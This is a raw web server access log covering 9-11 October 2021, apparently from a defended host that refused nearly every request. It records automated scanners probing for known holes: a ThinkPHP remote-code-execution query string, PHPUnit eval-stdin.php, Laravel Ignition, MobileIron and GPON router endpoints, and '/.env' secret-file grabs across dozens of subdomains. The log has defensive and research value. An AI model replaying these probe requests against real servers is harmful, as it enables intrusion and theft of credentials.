-] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:21 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:22 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [09/Oct/2021:19:57:25 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:25 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:28 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:31 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:31 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [09/Oct/2021:19:57:31 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:20:04:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.32.197.94] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [09/Oct/2021:21:33:37 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" [09/Oct/2021:21:33:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [09/Oct/2021:21:33:48 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:49 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:49 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:49 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:58 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:58 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:59 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:21:33:59 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [09/Oct/2021:23:04:23 +0000] 400 - - http localhost "-" [Client 89.248.165.205] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:00:08:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:00:14:19 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:00:15:21 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:00:16:18 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [10/Oct/2021:01:27:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:01:27:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:01:27:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:02:21:03 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:03:08:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:03:16:04 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 161.35.148.189] [Length 0] [Gzip -] "curl/7.3.2" "-" [10/Oct/2021:03:17:48 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 134.209.202.28] [Length 0] [Gzip -] "curl/7.3.2" "-" [10/Oct/2021:03:54:01 +0000] 444 - GET https 64.22.31.253 "//v1/RCE.php" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [10/Oct/2021:04:46:55 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:04:46:55 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:04:46:56 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:04:54:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:04:54:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:04:55:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.104.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:05:31:41 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.57] [Length 0] [Gzip -] "Go http package" "-" [10/Oct/2021:06:12:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:06:12:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [10/Oct/2021:06:12:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [10/Oct/2021:06:47:59 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:06:50:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.64.248] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [10/Oct/2021:07:13:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.205.198] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:07:50:51 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [10/Oct/2021:07:50:51 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:50:55 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:50:55 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:50:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:50:58 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:02 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:07:51:03 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:03 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:05 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:05 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:07:51:08 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Oct/2021:09:23:32 +0000] 400 - - https localhost "-" [Client 18.118.170.27] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:09:53:22 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 61.135.15.177] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [10/Oct/2021:10:30:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.201.79] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:11:47:35 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.9] [Length 0] [Gzip -] "Go http package" "-" [10/Oct/2021:12:54:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.54] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Oct/2021:15:17:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:02:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Oct/2021:17:10:47 +0000] 400 - - https localhost "-" [Client 34.222.197.222] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:17:43:18 +0000] 400 - HEAD http localhost "/" [Client 161.35.239.161] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:17:43:19 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:19 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:19 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:19 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:19 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:20 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:20 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:20 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:20 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 161.35.239.161] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [10/Oct/2021:17:43:20 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 161.35.239.161] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [10/Oct/2021:17:43:20 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:21 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:21 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 161.35.239.161] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:17:43:21 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 161.35.239.161] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [10/Oct/2021:18:58:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 199.195.251.43] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:18:58:52 +0000] 400 - - https localhost "-" [Client 199.195.251.43] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:18:58:53 +0000] 400 - - http localhost "-" [Client 199.195.251.43] [Length 154] [Gzip -] "-" "-" [10/Oct/2021:18:59:03 +0000] 400 - - https localhost "-" [Client 199.195.251.43] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:18:59:04 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 199.195.251.43] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Oct/2021:18:59:04 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 199.195.251.43] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Oct/2021:18:59:05 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 199.195.251.43] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Oct/2021:19:47:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 94.102.51.107] [Length 252] [Gzip -] "-" "-" [10/Oct/2021:21:07:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [10/Oct/2021:21:07:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [10/Oct/2021:21:07:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.167.142] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [10/Oct/2021:21:07:23 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:25 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:25 +0000] 400 - - https localhost "-" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:29 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:29 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:29 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 71.6.167.142] [Length 0] [Gzip -] "-" "-" [10/Oct/2021:21:07:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [10/Oct/2021:23:01:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Oct/2021:23:28:29 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https dev.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https test.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https web.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https beta.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https game.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https demo.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https support.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https staging.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https laravel.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https new.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https testing.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https development.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https sandbox.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:38 +0000] 444 - GET https login.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https apps.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https local.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https backend.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https cms.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https sqs.moralanimal.net "/.env" [Client 